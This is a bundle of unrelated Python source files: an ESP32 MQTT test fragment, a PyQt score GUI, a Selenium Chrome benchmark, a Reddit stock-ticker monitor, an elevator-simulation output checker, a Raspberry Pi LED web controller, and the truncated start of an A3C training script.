print('ENV_TEST_FAILURE: Cannot connect to AP')
raise
print("Checking py-client received msg published from esp...")
if not event_client_received_correct.wait(timeout=30):
raise ValueError('Wrong data received, msg log: {}'.format(message_log))
print("Checking esp-client received msg published from py-client...")
dut1.expect(re.compile(r"DATA=data_to_esp32"), timeout=30)
finally:
event_stop_client.set()
thread1.join()
if __name__ == '__main__':
test_examples_protocol_mqtt_ws()
|
mbl_gui_window.py
|
import time
from PyQt5.QtCore import QTimer, pyqtSignal
from PyQt5.QtGui import QPixmap, QFont
from PyQt5.QtWidgets import QMainWindow, QDialog, QApplication, QLabel
from lsl.mbl_lsl_receiver import MBL_LSLReceiver
from visuals.gui import Ui_MainWindow
from threading import Thread
class MBL_GuiWindow(QMainWindow):
def __init__(self, parent=None):
super().__init__(parent)
self.thread = None
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.connect_signals_slots()
self.receiver = MBL_LSLReceiver()
self.receiver.start()
self.last_time = time.time()
# Hide GUI
self.ui.VisualsBox.setEnabled(False)
self.ui.SettingsBox.setEnabled(False)
# prepare score label
self.score = 0
self.ui.score_value.setText(str(self.score))
self.ui.score_value.setStyleSheet('color: #ffffff')
self.ui.score_value.setFont(QFont('MS Shell Dlg 2', 16))
# creating signals
self.signalUpdateScore = pyqtSignal()
# creating label
self.head_label_a = QLabel(self)
self.head_label_b = QLabel(self)
# loading images
self.pixmap_a = QPixmap('res\\headA_resized.png')
self.pixmap_b = QPixmap('res\\headB_resized.png')
# adding images to labels
self.head_label_a.setPixmap(self.pixmap_a)
self.head_label_b.setPixmap(self.pixmap_b)
# Optional, resize label to image size and remove background
self.head_label_a.resize(self.pixmap_a.width(), self.pixmap_a.height())
self.head_label_b.resize(self.pixmap_b.width(), self.pixmap_b.height())
self.head_label_a.setStyleSheet("background-color: rgba(255, 255, 255, 0)")
self.head_label_b.setStyleSheet("background-color: rgba(255, 255, 255, 0)")
self.head_label_a.move(300, 200)
self.head_label_b.move(800, 200)
# Update the interface every 0.5 seconds
# make QTimer
self.qTimer = QTimer()
# set interval to 1 s
self.qTimer.setInterval(500) # 1000 ms = 1 s
# connect timeout signal to signal handler
self.qTimer.timeout.connect(self.update_head_position)
# start timer
self.qTimer.start()
def connect_signals_slots(self):
print("No signals implemented yet") # implement action connections
def show_gui_threaded(self):
self.thread = Thread(target=self.show())
def stop_gui_thread(self):
self.thread.join()
def update_head_position(self):
delta_time = time.time() - self.last_time
step = 450 * self.receiver.correlation_score * delta_time
self.head_label_a.move(300 + step, 200)
self.head_label_b.move(800 - step, 200)
self.last_time = time.time()
if self.receiver.correlation_score > 0.9:
self.score += 1
self.ui.score_value.setText(str(self.score))
def reset_head_position(self):
self.head_label_a.move(300, 200)
self.head_label_b.move(800, 200)
|
chrome_driver_manage_benchmark.py
|
# coding=utf-8
from threading import Thread, Semaphore
from collections import deque
from selenium.webdriver import Chrome, ChromeOptions
from benchmarks.utils import log_time
TEST_URL = 'https://www.baidu.com/'
def make_chrome_options():
chrome_options = ChromeOptions()
chrome_options.add_argument('--headless')
chrome_options.add_argument('--incognito')
chrome_options.add_argument('--ignore-certificate-errors')
chrome_options.add_argument('--ignore-ssl-errors')
chrome_options.add_argument('--disable-gpu')
chrome_options.add_argument('--no-sandbox')
prefs = {'profile.managed_default_content_settings.images': 2}
chrome_options.add_experimental_option('prefs', prefs)
return chrome_options
def create_chrome_driver():
driver = Chrome(options=make_chrome_options())
driver.set_page_load_timeout(10)
driver.set_script_timeout(10)
driver.implicitly_wait(10)
return driver
def reopen_chrome_thread(sem):
driver = None
try:
driver = create_chrome_driver()
driver.get(TEST_URL)
except Exception as e:
print(e)
finally:
if driver:
driver.quit()
sem.release()
@log_time('reopen chrome')
def reopen_chrome(times, clients):
sem = Semaphore(clients)
for i in range(times):
sem.acquire()
t = Thread(target=reopen_chrome_thread, args=(sem,))
t.start()
class DriverManager:
def __init__(self):
self.available_drivers = deque()
def get_driver(self):
try:
driver = self.available_drivers.popleft()
except IndexError:
driver = create_chrome_driver()
return driver
def push_driver(self, driver):
self.available_drivers.append(driver)
def close(self):
try:
while True:
driver = self.available_drivers.popleft()
try:
driver.quit()
except Exception:
pass
except IndexError:
pass
def reset_driver(driver):
assert isinstance(driver, Chrome)
driver.execute_script('window.open();')
handles = driver.window_handles
for i in range(0, len(handles) - 1):
driver.switch_to.window(handles[i])
driver.close()
driver.switch_to.window(handles[-1])
def manage_chrome_tabs_thread(sem, manager):
driver = None
try:
driver = manager.get_driver()
driver.get(TEST_URL)
reset_driver(driver)
except Exception as e:
print(e)
if driver is not None:
driver.quit()
driver = None
finally:
if driver is not None:
manager.push_driver(driver)
sem.release()
@log_time('manage chrome tabs')
def manage_chrome_tabs(times, clients):
sem = Semaphore(clients)
manager = DriverManager()
for i in range(times):
sem.acquire()
t = Thread(target=manage_chrome_tabs_thread, args=(sem, manager))
t.start()
manager.close()
if __name__ == '__main__':
print('------------------------')
print('Reopen Chrome every time')
print('------------------------')
reopen_chrome(times=50, clients=5)
print('------------------')
print('Manage Chrome tabs')
print('------------------')
manage_chrome_tabs(times=50, clients=5)
|
symbols.py
|
import os
import sys
import praw
import spacy
nlp = spacy.load('en_core_web_sm',disable=['ner','textcat'])
import nltk
from nltk.tokenize import word_tokenize
import glob
import pandas as pd
import re
from datetime import datetime
import threading
dev_mode = False
def fix_path(name):
if dev_mode == True:
return name
return sys.path[0]+'/'+name
# Get the symbols
class Tickers:
def __init__(self):
df = pd.DataFrame()
for filename in glob.glob(fix_path('datasets/symbols/*')):
_df = pd.read_csv(filename, sep='\t')
_df['source'] = re.findall(r"symbols\/([a-zA-Z]+)\.txt", filename)[0]
df = df.append(_df)
self.df = df.dropna()
tickers = Tickers()
df = tickers.df
# Symbols to match & ignore
real_symbols = df['Symbol'].unique()
false_symbol = ['ON','IN','AT','FOR','BY','DD','YOLO','CORP','ONE','SUB','MOON','CEO','OUT','INTO','MAN','POST','BRO','LIFE','CALL','DUDE','IDEA']
# Get the credentials & settings for PRAW
if dev_mode != True:
from auth import reddit_client_id, reddit_client_secret, reddit_password, reddit_useragent, reddit_username
##reddit_client_id=os.environ['reddit_client_id']
#reddit_client_secret=os.environ['reddit_client_secret']
#reddit_password=os.environ['reddit_password']
#reddit_useragent=os.environ['reddit_useragent']
#reddit_username=os.environ['reddit_username']
# Monitor Reddit
class Monitor:
def __init__(self):
print("Monitoring")
self.df = False
self.df_name = False
if os.path.exists(fix_path('datasets/datasets.pkl')):
self.datasets = pd.read_pickle(fix_path('datasets/datasets.pkl'))
else:
self.datasets = pd.DataFrame()
# PRAW setup
self.praw = praw.Reddit(
client_id=reddit_client_id,
client_secret=reddit_client_secret,
password=reddit_password,
user_agent=reddit_useragent,
username=reddit_username
)
def start(self, subreddit="wallstreetbets", thread=True):
sub = self.praw.subreddit(subreddit)
if thread is True:
commentThread = threading.Thread(name='comments', target=self.monitorComments, args=(sub,subreddit))
submissionThread = threading.Thread(name='submissions', target=self.monitorSubmissions, args=(sub,subreddit))
commentThread.start()
submissionThread.start()
else:
self.monitorComments(sub,subreddit)
self.monitorSubmissions(sub,subreddit)
def monitorSubmissions(self, sub, subreddit):
for submission in sub.stream.submissions():
self.process_submission(submission, subreddit)
def monitorComments(self, sub, subreddit):
for comment in sub.stream.comments():
self.process_comment(comment, subreddit)
def process_submission(self, submission, subreddit):
NER = nlp(submission.title.lower())
NER2 = nlp(submission.selftext.lower())
found = []
has_rocket = '🚀' in submission.title.lower()
for token in NER:
if '.' in token.text:
w = token.text.upper().split('.')[0]
else:
w = token.text.upper()
if token.pos_ in ['ADP','NOUN','PROPN'] and w in real_symbols and w not in false_symbol:
found.append(w)
for token in NER2:
if '.' in token.text:
w = token.text.upper().split('.')[0]
else:
w = token.text.upper()
if token.pos_ in ['ADP','NOUN','PROPN'] and w in real_symbols and w not in false_symbol:
found.append(w)
if (len(found)>0):
#print('\n\n----------------')
#print(has_rocket, submission.title)
#print(found)
self.record(source='submission', has_rocket=has_rocket, symbols=list(set(found)), title=submission.title, subreddit=subreddit)
def process_comment(self, comment, subreddit):
NER = nlp(comment.body.lower())
found = []
has_rocket = '🚀' in comment.body.lower()
for token in NER:
if '.' in token.text:
w = token.text.upper().split('.')[0]
else:
w = token.text.upper()
if token.pos_ in ['ADP','NOUN','PROPN'] and w in real_symbols and w not in false_symbol:
found.append(w)
if (len(found)>0):
self.record(source='comment', has_rocket=has_rocket, symbols=list(set(found)), title=comment.body, subreddit=subreddit)
def get_df(self):
d = datetime.now()
dname = '{}-{}-{}_{}_{}'.format(d.year,d.month,d.day,d.hour,d.minute)
filename = fix_path("datasets/data/"+dname+".pkl")
if self.df_name != False:
filename_prev = fix_path("datasets/data/"+self.df_name+".pkl")
if self.df_name != dname:
# New timestep, move on to a new dataset
# Save to the index
self.datasets.at[datetime.timestamp(d), 'filename'] = filename.replace('/home/julien/mk2/main/','')
self.datasets.to_pickle(fix_path('datasets/datasets.pkl'))
print("#### New DF: ", filename)
# No the first run? There was a previous timestep buffer?
if self.df_name != False:
self.df.to_pickle(filename_prev)
# Create/recover a new df
if os.path.exists(filename):
# Recover existing file
self.df = False
self.df = pd.read_pickle(filename)
self.df_name = dname
else:
# Create a new DF
self.df = False
self.df = pd.DataFrame(columns=['comment', 'submission', 'rockets'])
self.df_name = dname
self.df.to_pickle(filename)
return self.df
def record(self, source, has_rocket, symbols, subreddit, title=''):
print(subreddit, source, has_rocket, symbols)
df = self.get_df()
for symbol in symbols:
if symbol in df.index:
df.at[symbol, source] = df.at[symbol, source]+1
if has_rocket:
df.at[symbol, 'rockets'] = df.at[symbol, 'rockets']+1
else:
df.at[symbol, "submission"] = 0
df.at[symbol, "comment"] = 0
df.at[symbol, source] = 1
if has_rocket:
df.at[symbol, 'rockets'] = 1
else:
df.at[symbol, 'rockets'] = 0
reddit = Monitor()
if dev_mode == True:
reddit.start(subreddit="wallstreetbets", thread=False)
else:
reddit.start(subreddit="wallstreetbets", thread=True)
reddit.start(subreddit="pennystocks", thread=True)
reddit.start(subreddit="Baystreetbets", thread=True)
|
pat.py
|
import re
import subprocess
import threading
import time
# from time import time
from config import *
from utils import *
def pat(test_data_in, class_path, jar, prt=False):
inputfile = open(test_data_in).readlines()
# print("@@@", test_data_in)
basetime, maxtime = datacheck(test_data_in)
# input = parseInput(inputfile)
# print("@@@", input)
start = time.time()
outputfile = callProgram(r"java -Xmx128m -cp {} {}".format(jar, class_path), inputfile)
end = time.time()
passed_time = end - start
# output = parseOutput(outputfile)
if prt:
for line in outputfile:
print(line)
# A, B, C = parseOutputABC(outputfile)
# print("Elevator A:")
# for line in A:
# print("\033[1;34m{}\033[0m".format(line))
# print("Elevator B:")
# for line in B:
# print("\033[1;35m{}\033[0m".format(line))
# print("Elevator C:")
# for line in C:
# print("\033[1;36m{}\033[0m".format(line))
# print(outputfile)
ac = checkAll(inputfile, outputfile)
t_ac = passed_time < maxtime
if ac is True and t_ac is True:
if passed_time > basetime + 20:
print("\033[1;33mWarning: {}, time:{}, base_time: {}\033[0m"
.format(test_data_in, passed_time, basetime, maxtime))
return True, passed_time
print("\033[1;32mPassed: {}, time:{}, base_time: {}\033[0m".format(test_data_in, passed_time, basetime))
return True, passed_time
if ac is not True:
print("\033[1;31mFailed: {}\n\tWA: {}\033[0m".format(test_data_in, ac))
return False, passed_time
if t_ac is not True:
print("\033[1;31mWarning: {}\n\tTLE: {}, max_time: {}\033[0m".format(test_data_in, passed_time, maxtime))
return True, passed_time
def parseInput(inputfile):
personRequests = []
for line in inputfile:
result = re.search(r'\[(.*)\](-?\d+)-FROM-(-?\d+)-TO-(-?\d+)', line.strip(), re.M)
personRequests.append(result.groups())
return personRequests
def run(p, output):
while True:
line = p.stdout.readline()
if not line:
break
# print(line)
output.append(line.decode().strip())
def callProgram(cmd, inputFile):
# print(cmd)
# os.chdir("temp")
# print(inputFile)
output = []
if cfg.CLOSE_STDERR:
p = subprocess.Popen(cmd,
shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
p = subprocess.Popen(cmd,
shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
w = threading.Thread(target=run, args=(p, output,))
last_time = 0
for line in inputFile:
result = re.search(r'\[(.*)\](.*)', line.strip(), re.M)
sleeptime = result.group(1)
inputLine = result.group(2)
# print(sleeptime)
time.sleep(float(sleeptime) - last_time)
last_time = float(sleeptime)
write_str = inputLine + '\r\n'
# print(write_str)
p.stdin.write(write_str.encode("UTF-8"))
p.stdin.flush()
time.sleep(0.01)
w.start()
p.stdin.close()
try:
if p.wait(cfg.TIME_LIMIT) != 0:
return output
except subprocess.TimeoutExpired:
p.kill()
p.terminate()
print("\033[1;31mError: TimeoutExpired: May in the endless loop/wait. Check your 'synchronized'.")
return output
# print(p.returncode)
if p.returncode != 0:
print("\033[1;31mError: return code {} is not 0\033[0m".format(p.returncode))
return output
# os.chdir("..")
# print(output)
return output
def parseOutputABC(inputfile):
sequenceA = []
sequenceB = []
sequenceC = []
for line in inputfile:
result = re.search(r'-A', line.strip(), re.M)
if result is not None:
sequenceA.append(line)
continue
result = re.search(r'-B', line.strip(), re.M)
if result is not None:
sequenceB.append(line)
continue
result = re.search(r'-C', line.strip(), re.M)
if result is not None:
sequenceC.append(line)
continue
return sequenceA, sequenceB, sequenceC
def parseOutput(inputfile):
sequence = []
# IN = []
# OUT = []
# OPEN = []
# CLOSE = []
for line in inputfile:
result = re.search(r'\[(.*)\]IN-(-?\d+)-(-?\d+)', line.strip(), re.M)
if result is not None:
sequence.append(["IN", result.groups()])
continue
result = re.search(r'\[(.*)\]OUT-(-?\d+)-(-?\d+)', line.strip(), re.M)
if result is not None:
sequence.append(["OUT", result.groups()])
continue
result = re.search(r'\[(.*)\]OPEN-(-?\d+)', line.strip(), re.M)
if result is not None:
sequence.append(["OPEN", result.groups()])
continue
result = re.search(r'\[(.*)\]CLOSE-(-?\d+)', line.strip(), re.M)
if result is not None:
sequence.append(["CLOSE", result.groups()])
continue
result = re.search(r'\[(.*)\]ARRIVE-(-?\d+)', line.strip(), re.M)
if result is not None:
sequence.append(["ARRIVE", result.groups()])
continue
return sequence
def check_1_1(input, output, eId):
sequence = output
time = []
level = []
for mesType, mes in sequence:
time.append(float(mes[0]))
if mesType == "IN" or mesType == "OUT":
level.append(int(mes[2]))
else:
level.append(int(mes[1]))
assert len(time) == len(level)
for i in range(len(time) - 1):
estimate_time = abs(level[i + 1] - level[i]) * cfg.LEVEL_TIME[eId]
if level[i] * level[i + 1] < 0:
estimate_time -= cfg.LEVEL_TIME[eId]
if not (time[i + 1] - time[i] >= estimate_time - cfg.EPS):
return "The elevator has no enough time to move such far distance at {}: {}. {}, {}".format(i, [sequence[i-1], sequence[i], sequence[i+1]], time[i + 1] - time[i], estimate_time - cfg.EPS)
return True
def check_1_2(intput, output, eId):
sequence = output
length = len(sequence)
for i, (mesType, mes) in enumerate(sequence):
if mesType == "OPEN" and i != 0:
index = i + 1
while index < len(sequence) and sequence[index][0] != "CLOSE":
index += 1
diff = cfg.DOOR_TIME
if index == len(sequence):
return "No Close with {}".format(sequence[i])
if sequence[index][0] == "CLOSE":
diff = cfg.DOOR_TIME * 2
if not (float(sequence[index][1][0]) - float(sequence[i][1][0]) >= diff) - cfg.EPS:
# print(sequence[i + 1], sequence[i])
return "The elevator has no enough time to open/close at {}: {}".format(i, [sequence[index], sequence[i], sequence[i+1]])
# if mesType == "CLOSE" and i != length - 1:
# index = i - 1
# while index > 0 and sequence[index][0] != "OPEN":
# index -= 1
# diff = 0.25
# if sequence[index][0] == "OPEN":
# diff = 0.5
# if not (float(sequence[i][1][0]) - float(sequence[index][1][0]) > diff - 0.001):
# # print(sequence[i], sequence[i - 1])
# return "The elevator has no enough time to close at {}".format(i)
return True
def getLevel(sequence):
mesType, mes = sequence
if mesType in ["OPEN", "CLOSE", "ARRIVE"]:
return int(mes[1])
else:
return int(mes[2])
def getTime(sequence):
return float(sequence[1][0])
def getId(sequence):
mesType, mes = sequence
assert mesType == "IN" or mesType == "OUT"
return int(mes[1])
def check_1_3(input, output, eId):
sequence = output
isClosed = True
for i, (mesType, mes) in enumerate(sequence):
if i != 1 and not isClosed and (getLevel(sequence[i - 1]) != getLevel(sequence[i])):
# print(sequence[i - 1], sequence[i])
return "The elevator is open at {} while you want it move: {}".format(i, [sequence[i-1], sequence[i], sequence[i+1]])
if mesType == "OPEN":
isClosed = False
if mesType == "CLOSE":
isClosed = True
return True
def check_1_4(input, output, eId):
sequence = output
isOpen = False
for i, (mesType, mes) in enumerate(sequence):
if not isOpen and (mesType == "IN" or mesType == "OUT"):
return "The elevator is closed at {} while you want someone in/out: {}".format(i, [sequence[i-1], sequence[i], sequence[i+1]])
if mesType == "OPEN":
if isOpen is True:
return "The elevator is open at {} while you want it open again: {}".format(i, [sequence[i - 1],
sequence[i],
sequence[i + 1]])
isOpen = True
if mesType == "CLOSE":
if isOpen is False:
return "The elevator is closed at {} while you want it close again: {}".format(i, [sequence[i - 1],
sequence[i],
sequence[i + 1]])
isOpen = False
if isOpen == True:
return "Elevator is not closed at the end."
return True
def check_3(input, output, eId):
sequence = output
levelNow = 1
arrivalTime = 0
for i, (mesType, mes) in enumerate(sequence):
if mesType == "ARRIVE":
level = getLevel(sequence[i])
if level in [0]:
return "Bad arrive 0 at {}: {}".format(i, [sequence[-1], sequence[i], sequence[i+1]])
time = getTime(sequence[i])
if levelNow in [-1, 1]:
if not 0 < abs(levelNow - level) <= 2:
return "Bad arrive 0 at {}: {}".format(i, [sequence[-1], sequence[i], sequence[i+1]])
else:
if not 0 < abs(levelNow - level) <= 1:
#print(levelNow, level)
return "Bad arrive at {}: {}".format(i, [sequence[-1], sequence[i], sequence[i+1]])
if not abs(arrivalTime - time) >= 0.4 - cfg.EPS:
return "Bad arrive at {}: {}".format(i, [sequence[-1], sequence[i], sequence[i+1]])
arrivalTime = time
levelNow = level
return True
def check_4(input, output, eId):
sequence = output
inside = set()
for i, (mesType, mes) in enumerate(sequence):
if mesType == "IN":
inside.add(getId(sequence[i]))
maxN = 0
if eId == "A":
maxN = 6
if eId == "B":
maxN = 8
if eId == "C":
maxN = 7
if len(inside) > maxN:
return "Elevator is full at {}: {}".format(i, [sequence[-1], sequence[i], sequence[i + 1]])
if mesType == "OUT":
if getId(sequence[i]) not in inside:
return "{} not in elevator at {}: {}".format(getId(sequence[i]), i, [sequence[-1], sequence[i], sequence[i + 1]])
inside.remove(getId(sequence[i]))
return True
def check_2(input, output):
id_now = {}
id_to = {}
id_set = []
ele = set()
for time, id_, from_, to in input:
id_now[int(id_)] = int(from_)
id_to[int(id_)] = int(to)
id_set.append(int(id_))
# print(id_now)
sequence = output
for i, (mesType, mes) in enumerate(sequence):
# print(id_now)
# print(sequence[i])
if mesType == "IN":
thisID = getId(sequence[i])
level = getLevel(sequence[i])
if (thisID not in id_now) or (level != id_now[thisID]):
return "{} is not at floor {} while you want the guy in.".format(thisID, level)
del id_now[thisID]
if thisID in ele:
return "{} has been in the elevator at {} while you want the guy in again.".format(thisID, i)
ele.add(thisID)
if mesType == "OUT":
thisID = getId(sequence[i])
if thisID not in ele:
return "{} is not in the elevator at {} while you want the guy out.".format(thisID, i)
ele.remove(thisID)
id_now[thisID] = getLevel(sequence[i])
if len(ele) > 0:
return "{} still in the elevator.".format(ele)
for id_ in id_set:
if id_now[int(id_)] != id_to[int(id_)]:
return "{} in the wrong floor at the end.".format(id_)
return True
def checkAllSequence(input, output, eId):
r_1_1 = check_1_1(input, output, eId)
r_1_2 = check_1_2(input, output, eId)
r_1_3 = check_1_3(input, output, eId)
r_1_4 = check_1_4(input, output, eId)
r_4 = check_4(input, output, eId)
# r_2 = check_2(input, output)
r_3 = check_3(input, output, eId)
if r_1_1 is not True:
return "check_1_1: \n\t" + str(r_1_1) + "\n\t" + str(output)
if r_1_2 is not True:
return "check_1_2: \n\t" + str(r_1_2) + "\n\t" + str(output)
if r_1_3 is not True:
return "check_1_3: \n\t" + str(r_1_3) + "\n\t" + str(output)
if r_1_4 is not True:
return "check_1_4: \n\t" + str(r_1_4) + "\n\t" + str(output)
if r_4 is not True:
return "check_4: \n\t" + str(r_4) + "\n\t" + str(output)
# if r_2 is not True:
# return "check_2: \n\t" + str(r_2) + "\n\t" + str(output)
if r_3 is not True:
return "check_3: \n\t" + str(r_3) + "\n\t" + str(output)
return True
def checkAll(inputfile, outputfile):
input = parseInput(inputfile)
sequenceAll = parseOutput(outputfile)
sequenceA, sequenceB, sequenceC = parseOutputABC(outputfile)
outputSequenceA = parseOutput(sequenceA)
outputSequenceB = parseOutput(sequenceB)
outputSequenceC = parseOutput(sequenceC)
r_A = checkAllSequence(input, outputSequenceA, "A")
r_B = checkAllSequence(input, outputSequenceB, "B")
r_C = checkAllSequence(input, outputSequenceC, "C")
r_All = check_2(input, sequenceAll)
if r_A is not True:
return "Error Elevator A: " + str(r_A) + "\n\t" + str(outputfile)
if r_B is not True:
return "Error Elevator B: " + str(r_B) + "\n\t" + str(outputfile)
if r_C is not True:
return "Error Elevator C: " + str(r_C) + "\n\t" + str(outputfile)
if r_All is not True:
return r_All + "\n\t" + str(outputfile)
return True
|
app.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""provide a webfrontend to set 12V LED light strips"""
################################################################################
# MIT License
#
# Copyright (c) 2017 Stefan Venz
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
################################################################################
import os
import re
import time
import threading
import socket
import cherrypy
from cherrypy.lib.static import serve_file
import pigpio
PATH = os.path.abspath(os.path.dirname(__file__))
CURDIR = os.getcwd()
cherrypy.config.update({
"tools.staticdir.dir": CURDIR,
"tools.staticdir.on": True,
"server.socket_host": socket.gethostbyname(socket.gethostname())
})
#define some values for later use
ON = 255
OFF = 0
R = 0
G = 1
B = 2
BACK_PI_LIGHTS = {
'ub' : [13, 19, 26],
'lb' : [16, 20, 21]
}
FRONT_PI_LIGHTS = {
'ur' : [18, 23, 24],
'lr' : [16, 20, 21],
'ul' : [17, 27, 22],
'll' : [13, 19, 26]
}
FRONT_PI_IP = '192.168.2.221'
BACK_PI = pigpio.pi()
FRONT_PI = pigpio.pi(FRONT_PI_IP)
FADE_TIME = 0.1
STEP_SIZE = 1
LOWER_LIMIT = 5
class LightControll(object):
"""Contains information and action about the light control"""
lights = {}
f_lights = {'ub' : 0,
'lb' : 0,
'ur' : 0,
'lr' : 0,
'ul' : 0,
'll' : 0
}
# fade functions
@classmethod
def init_fade(cls):
"""initialize all lights not to fade"""
cls.f_lights = {f_light: 0 for f_light in cls.f_lights}
@classmethod
def set_fade(cls, light):
"""set light to fade"""
cls.f_lights[light] = 1
@classmethod
def unset_fade(cls, light):
"""set light not to fade"""
cls.f_lights[light] = 0
@staticmethod
def resolve_pi(light):
"""return pi to use"""
if light in BACK_PI_LIGHTS:
return BACK_PI
return FRONT_PI
@staticmethod
def resolve_pi_lights(light):
"""return light array to use"""
if light in BACK_PI_LIGHTS:
return BACK_PI_LIGHTS
return FRONT_PI_LIGHTS
@classmethod
def resolve_pins(cls, light):
"""return the pin numbers for a given light"""
c_light = cls.resolve_pi_lights(light)
return c_light[light]
# set lights to use
def resolve_lights(self, **web_lights):
"""set LED strips to work on"""
for key in web_lights:
self.lights[re.search(r'\[(.*?)\]', key).group(1)] = web_lights[key]
print("weblights {}".format(web_lights))
print("lights: {}".format(self.lights))
# show website
@staticmethod
@cherrypy.expose
def index():
"""serve HTML file"""
return serve_file(os.path.join(PATH, 'index.html'))
# set color on color button click
@cherrypy.expose
def set_lights(self, red, green, blue, **web_lights):
"""set static color for LED Strips"""
self.resolve_lights(**web_lights)
for light in self.lights:
self.unset_fade(light)
control_pi = self.resolve_pi(light)
c_light = self.resolve_pi_lights(light)
print("light: {}: {}\n".format(light, self.lights[light]))
control_pi.set_PWM_dutycycle(int(c_light[light][R]), red)
control_pi.set_PWM_dutycycle(int(c_light[light][G]), green)
control_pi.set_PWM_dutycycle(int(c_light[light][B]), blue)
self.lights = {}
# fade light
@classmethod
def fade_light(cls, light):
"""per LED strip fade function"""
alter_green = -STEP_SIZE
alter_blue = 0
alter_red = 0
control_pi = cls.resolve_pi(light)
r_pin, g_pin, b_pin = cls.resolve_pins(light)
fade_red = control_pi.get_PWM_dutycycle(r_pin)
fade_green = control_pi.get_PWM_dutycycle(g_pin)
fade_blue = control_pi.get_PWM_dutycycle(b_pin)
while cls.f_lights[light]:
if alter_green:
fade_green += alter_green
if fade_green < LOWER_LIMIT:
# dim green to 0
control_pi.set_PWM_dutycycle(g_pin, LOWER_LIMIT)
fade_green = LOWER_LIMIT
alter_green = OFF
alter_blue = -STEP_SIZE
time.sleep(FADE_TIME)
continue
if fade_green > (ON - STEP_SIZE):
# set green to 255
control_pi.set_PWM_dutycycle(g_pin, ON)
fade_green = ON
alter_green = OFF
alter_blue = STEP_SIZE
time.sleep(FADE_TIME)
continue
# change green by STEP_SIZE
control_pi.set_PWM_dutycycle(g_pin, fade_green)
time.sleep(FADE_TIME)
if alter_blue:
fade_blue += alter_blue
if fade_blue < LOWER_LIMIT:
# dim blue to 0
control_pi.set_PWM_dutycycle(b_pin, LOWER_LIMIT)
fade_blue = LOWER_LIMIT
alter_blue = OFF
alter_red = STEP_SIZE
time.sleep(FADE_TIME)
continue
if fade_blue > (ON - STEP_SIZE):
# set blue to 255
control_pi.set_PWM_dutycycle(b_pin, ON)
fade_blue = ON
alter_blue = OFF
alter_red = -STEP_SIZE
time.sleep(FADE_TIME)
continue
# change green by STEP_SIZE
control_pi.set_PWM_dutycycle(b_pin, fade_blue)
time.sleep(FADE_TIME)
if alter_red:
fade_red += alter_red
if fade_red < LOWER_LIMIT:
# dim red to 0
control_pi.set_PWM_dutycycle(r_pin, fade_red)
fade_red = LOWER_LIMIT
alter_red = OFF
alter_green = -STEP_SIZE
time.sleep(FADE_TIME)
continue
if fade_red > (ON - STEP_SIZE):
# set red to 255
control_pi.set_PWM_dutycycle(r_pin, ON)
fade_red = ON
alter_red = OFF
alter_green = STEP_SIZE
time.sleep(FADE_TIME)
continue
# change red by STEP_SIZE
control_pi.set_PWM_dutycycle(r_pin, fade_red)
time.sleep(FADE_TIME)
def fade_lights(self, **web_lights):
"""start fade for selected LED strips"""
self.resolve_lights(**web_lights)
print("in fadeLights")
for light in self.lights:
self.set_fade(light)
threading.Thread(target=self.fade_light, args=(light,)).start()
self.lights = {}
@staticmethod
def turn_pi_lights(state):
"""switch all lights on/off"""
for light in BACK_PI_LIGHTS:
LightControll.unset_fade(light)
print(light)
if BACK_PI.connected:
for pin in BACK_PI_LIGHTS[light]:
print(pin)
BACK_PI.set_PWM_dutycycle(int(pin), state)
for light in FRONT_PI_LIGHTS:
print(light)
if FRONT_PI.connected:
for pin in FRONT_PI_LIGHTS[light]:
print(pin)
FRONT_PI.set_PWM_dutycycle(int(pin), state)
@cherrypy.expose
def control_button_click(self, button_id, **web_lights):
"""backend for buttons on webinterface - react on button click"""
print("button_id: {}\n".format(button_id))
if button_id in 'off':
print("in off")
self.turn_pi_lights(OFF)
if button_id in 'on':
self.init_fade()
print("in on")
self.turn_pi_lights(ON)
if button_id in 'fade':
print("in fade")
if web_lights:
self.fade_lights(**web_lights)
def __init__(self):
self.init_fade()
self.turn_pi_lights(OFF)
if __name__ == '__main__':
cherrypy.quickstart(LightControll(), '/')
|
test_spawn.py
|
from __future__ import absolute_import
from billiard import get_context
class test_spawn:
def test_start(self):
ctx = get_context('spawn')
p = ctx.Process(target=task_from_process, args=('opa',))
p.start()
p.join()
return p.exitcode
def task_from_process(name):
print('proc:', name)
|
run_rl.py
|
from __future__ import print_function, division
import os
os.environ["OMP_NUM_THREADS"] = "1"
import argparse
import torch
import torch.multiprocessing as mp
from rl.environment import atari_env
from baselines.sam.utils import read_config
from baselines.sam.a3c import A3CSAM
from rl.train_sam import train
from rl.test_sam import test
from rl.shared_optim import SharedRMSprop, SharedAdam
#from gym.configuration import undo_logger_setup
import time
#undo_logger_setup()
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument(
'--lr',
type=float,
default=0.0001,
metavar='LR',
help='learning rate (default: 0.0001)')
parser.add_argument(
'--gamma',
type=float,
default=0.99,
metavar='G',
help='discount factor for rewards (default: 0.99)')
parser.add_argument(
'--tau',
type=float,
default=0.92,
metavar='T',
help='parameter for GAE (default: 1.00)')
parser.add_argument(
'--seed',
type=int,
default=1,
metavar='S',
help='random seed (default: 1)')
parser.add_argument(
'--workers',
type=int,
default=32,
metavar='W',
help='how many training processes to use (default: 32)')
parser.add_argument(
'--num-steps',
type=int,
default=20,
metavar='NS',
help='number of forward steps in A3C (default: 20)')
parser.add_argument(
'--max-episode-length',
type=int,
default=10000,
metavar='M',
